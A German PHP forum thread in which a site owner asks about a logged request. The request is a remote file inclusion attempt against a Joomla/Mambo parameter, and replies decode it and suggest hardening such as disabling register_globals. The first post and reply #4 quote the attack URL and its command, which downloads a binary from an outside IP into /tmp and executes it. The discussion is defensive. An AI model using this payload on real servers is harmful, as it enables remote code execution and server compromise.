Komische Seitenaufruf

Einklappen
X
Einklappen
 
  • Seite von 1
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige template Weiter
  • #1

    Komische Seitenaufruf

    Hallo,
    ich hab auf meiner Seite ein System das mir Seitenaufrufe loggt und ich hab in der Datenbank folgenden eintrag gefunden:
    /index.php?option=com_content&do_pdf=
    1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20
    /tmp;wget%20209.123.16.34/giculo;chmod
    %20744%20giculo;./giculo;echo%20YYY;echo|

    ich hab keine ahnung was dieser Aufruf macht zumindest wird er von System geblockt, nun zu meiner Frage weiß jemand was dieser Seitenaufruf versucht?

    MFG
    Simon
    Zuletzt geändert von Simon2004; 14.03.2006, 15:44.
    Stichworte: -
  • #2
    Re: Komische Seitenaufruf

    Ganz analog zu diesem Thema:
    http://www.php-resource.de/forum/sho...threadid=67231
    I don't believe in rebirth. Actually, I never did in my whole lives.

    Kommentar

    • #3
      also wenn ich das richtig versteh hab ich es da mit einen hacker zu tun, oder?

      Kommentar

      • #4
        Dann schau dir diesen Teil mal genau an...
        Code:
        http://209.123.16.34/cmd.gif?&cmd=cd%20
/tmp;wget%20209.123.16.34/giculo;chmod
%20744%20giculo;./giculo;echo%20YYY;echo|
        Was versucht dieser Seitenaufruf wohl zu machen?
        Sieht mir nach..
        cd /tmp;
        wget 209.123.16.34/giculo;
        chmod 744 giculo;
        ./giculo;
        echo YYY;
        ...aus.
        mfg - sagg

        Kommentar

        • #5
          also ich bin nicht so wahnsinnig fit wenn es um cmd geht
          aber was ich rauslesen kann ist
          cd /tmp
          also er wechlselt in den ordner tmp
          wget 209.123.16.34/giculo;
          keine ahung was das soll vielleicht eine datei runterladen
          chmod 744 giculo;
          dann der datei rechte geben
          ./giculo;
          sie ausführn?
          echo YYY;
          YYY ausgeben

          lieg ich da mit der vermutung richtig?
          nun macht mein system folgendes, es erkennt solche aufrufe und wenn es einen erkennt gibt es die() zurück, also sollte auf dem server nichts passieren und wenn ja wie kann man dieses loch stopfen?

          Kommentar

          • #6
            Original geschrieben von Simon2004
            ...wie kann man dieses loch stopfen?
            Das deine Seite aufgerufen wird?
            Er hat doch allem Anschein nach keinen Erfolg gehabt (Ob das nun an dem "die()" lag oder das die Sonne so tief stand, is ja Zweitrangig.).
            mfg - sagg

            Kommentar

            • #7
              Die Schreibrechte von /usr/bin/wget auf 700 setzen (Owner only). Ebenso w3m, lynx ....

              Ansonsten register_globals auf off setzen, seine Attacke setzt das nämlich voraus...
              Für alle die Fehler suchen, gibts gratis tolle Debuggingmöglichkeiten:
              var_dump(), print_r(), debug_backtrace und echo.
              Außerdem gibt es für unsere Neueinsteiger ein hervorragendes PHP Tutorial zu PHP 4 und PHP 5 (OOP)
              Es heißt $array['index'] und nicht $array[index]! Und nein, das ist nicht egal!
              Dieses Thema lesen, um Ärger im Forum und verzögerte Hilfen zu vermeiden.

              Kommentar

              • #8
                alles klar, danke für eure antworten

                Kommentar

                Vorherige template Weiter
                Lädt...
                X